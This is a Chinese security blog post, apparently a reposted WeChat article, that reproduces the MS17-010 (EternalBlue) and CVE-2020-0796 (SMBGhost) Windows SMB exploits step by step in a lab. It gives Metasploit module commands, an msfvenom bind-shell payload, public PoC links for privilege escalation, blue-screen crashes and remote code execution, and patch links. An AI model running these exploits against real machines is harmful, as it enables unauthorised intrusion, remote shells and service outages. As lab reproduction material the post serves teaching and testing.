前言:
MS17-010在打内网的时候也算是常用的了,也是很基础的一个洞,但是之前好多师傅在打内网的时候都有种种问题私聊我,所以今天把MS17-010(永恒之蓝)和CVE-2020-0796都给师傅们完整的复现一遍。
MS17-010:
1,MS17-010介绍:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。
2,漏洞原理:
漏洞利用445端口执行,原本是作为局域网共享使用的一个端口,但恶意人员可以利用此端口偷偷的执行共享服务或者其他命令执行操作。
3,影响Windows版本:
Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016
4,复现过程:
靶机我用的是Windows Server 2008系统,迅雷下载地址:
ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_x64_dvd_617598.iso|3368839168|D282F613A80C2F45FF23B79212A3CF67|/
攻击机我用的是kali linux2022.4中的msf6,大家也可以把msf下载到windows用下载地址为:
https://windows.metasploit.com/
下载好后双击msi文件
点击next然后同意安装协议在选择安装盘符一般安装在c盘外面就行,安装完毕之后就设置环境变量,打开环境设置。
选择path编辑
点击新建输入安装的文件路径点确定就可以了
点击确定关闭然后win+r输入cmd
输入msfvenom即可启动了
我这边方便一点直接用kali上的。
先安装好win server2008的环境查看IP 地址
用nmap扫一下发现445端口存在ms17-010
然后打开msf输入search ms17-010查询一下攻击模块
输入use 3使用第三个模块,在输入show options查看要设置的东西
显示yes的都是需要设置的,我们这边就设置一个rhosts(要攻击机器的ip地址)其它保持默认,一般情况下rport都会是445如果不是就得使用 set rport 445命令来设置成445,我这边设置一下rhosts就行
set rhosts 192.168.1.105
设置好后直接运行就行
run
出现这个就代表存在ms17-010
随后设置攻击载荷,还是先查询一下
选择0的攻击模块
use 0
还是先用show options查看要设置的端口和ip,我这边还是要设置一下rhosts也就是要攻击机器的ip,lhost是自己机器的IP,lport保持默认就行
set rhosts 192.168.1.10
在输入run就可以开始攻击
run
成功了然后在输入一个shell命令即可那到shell
这边分别输入一个calc和start cmd指令让对方弹一个计算器框和cmd框试试
成功弹窗。
修复补丁:
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
CVE-2020-0796:
漏洞简介:
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
影响系统版本:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
复现过程:
我这边用的是win10系统,迅雷下载地址为:
ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|
CVE-2020-0796的玩法比较多,有蓝屏啊,本地提权啊,还有就是反弹shell。
可以用奇安信的健侧工具看看是否存在漏洞,下载地址为:
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
下载完毕后进入文件目录运行cmd,然后输入指令监测:
CVE-2020-0796-Scanner.exe 192.168.1.106
存在CVE-2020-0796。
先给大家放一个本地提权的POC:
https://github.com/danigargu/CVE-2020-0796/
用法就是这样也是比较简单的
蓝屏POC:
https://github.com/eerykitty/CVE-2020-0796-PoC/
使用方法就是py文件后跟ip地址就行
python CVE-2020-0796.py 192.168.1.106
成功使目标蓝屏。
反弹shell:
https://github.com/chompie1337/SMBGhost_RCE_PoC
用msf生成payload
msfvenom -p windows/x64/meterpreter/bind_tcp lport=9999 -f py -o Fshell.txt
生成code替换到poc里的exploit.py的USER_PAYLOAD参数仔把参数buf改为USER_PAYLOAD。
然后msf里设置监听,命令如下:
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 9999
set rhost 192.168.1.106
run
lport与此前生产Fshell的也就是生成木马的时候的得是一致的,然后运行poc。
python3 explpit.py -ip 192.168.1.106
反弹shell成功
还是让目标弹一个计算器试试。
成功弹出。
修复补丁:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
原文始发于微信公众号(嗨嗨安全):MS17-010和CVE-2020-0796的完整复现(flower安全日志)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论